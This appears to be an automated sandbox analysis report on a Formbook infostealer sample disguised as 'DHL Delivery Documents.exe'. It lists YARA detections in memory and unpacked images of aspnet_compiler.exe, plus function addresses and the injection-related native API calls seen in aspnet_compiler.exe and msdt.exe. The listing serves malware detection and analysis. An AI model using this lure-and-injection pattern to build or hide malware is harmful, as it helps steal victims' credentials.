          Source: 7.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.0.aspnet_compiler.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.0.aspnet_compiler.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.0.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.0.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000000.296093050.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000000.296093050.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000000.331650604.000000001025A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000000.331650604.000000001025A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.592017625.00000000035D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.592017625.00000000035D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000000.296408181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000000.296408181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.299090873.0000000013AD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.299090873.0000000013AD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.356715878.00000000012E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.356715878.00000000012E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.356781952.0000000001320000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.356781952.0000000001320000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.596403511.0000000004FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.596403511.0000000004FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.356484497.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.356484497.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.586492056.0000000003130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.586492056.0000000003130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeCode function: 2_2_00007FFC081C3C37
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_00401027
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_00401030
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0041C130
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0041C235
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0041C367
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_00408C90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_00402D88
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_00402D90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0041A6DA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0041CF30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_00402FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_013FF900
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01414120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014199BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B1002
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014CE824
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141A830
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014C28EC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0140B090
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014220A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014C20A8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141AB40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0149CB4F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141A309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014C2B28
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B03DA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014BDBD2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0142ABD8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014A23E3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0142138B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0142EBB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014AFA2B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141B236
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B4AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014C22AE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014C1D55
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_013F0D20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014C2D07
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014C25DD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0140D5E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01422581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B2D82
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014BD466
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141B477
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0140841F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B4496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014CDFCE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014C1FF1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014BD616
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01416E30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014C2EF7
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05541D55
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05542D07
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05470D20
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_055425DD
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0548D5E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054A2581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05532D82
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0553D466
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0549B477
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0548841F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05534496
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0554DFCE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05541FF1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0553D616
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05496E30
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05542EF7
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0547F900
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05494120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054999BF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05531002
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0554E824
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0549A830
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_055428EC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0548B090
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054A20A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_055420A8
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0549AB40
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0551CB4F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0549A309
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05542B28
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0553DBD2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_055303DA
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054AABD8
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_055223E3
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054A138B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054AEBB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0552FA2B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0549B236
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05534AEF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_055422AE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0314C367
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0314C130
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0314CF30
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_03132FB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0314A6DA
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_03132D90
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_03132D88
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_03138C90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 013FB150 appears 136 times
          Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 0547B150 appears 136 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_004185F0 NtCreateFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_004186A0 NtReadFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_00418720 NtClose,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_004187D0 NtAllocateVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_004185EC NtCreateFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0041869A NtCreateFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0041869F NtReadFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0041871A NtClose,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_004187CA NtAllocateVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01439910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014399A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01439840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01439860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014398F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01439A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01439A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01439A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01439540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014395D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01439710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01439FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01439780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014397A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01439660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014396E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01439950 NtQueueApcThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014399D0 NtCreateProcessEx,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0143B040 NtSuspendThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01439820 NtEnumerateKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014398A0 NtWriteVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01439B00 NtSetValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0143A3B0 NtGetContextThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01439A10 NtQuerySection,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01439A80 NtOpenDirectoryObject,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01439560 NtWriteFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01439520 NtWaitForSingleObject,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0143AD30 NtSetContextThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014395F0 NtQueryInformationFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01439760 NtOpenProcess,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01439770 NtSetInformationFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0143A770 NtOpenThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0143A710 NtOpenProcessToken,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01439730 NtQueryVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01439650 NtQueryValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01439670 NtQueryInformationProcess,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01439610 NtEnumerateValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014396D0 NtCreateKey,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054B9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054B95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054B9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054B9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054B9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054B9650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054B9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054B96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054B96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054B9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054B99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054B9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054B9860 NtQuerySystemInformation,LdrInitializeThunk,
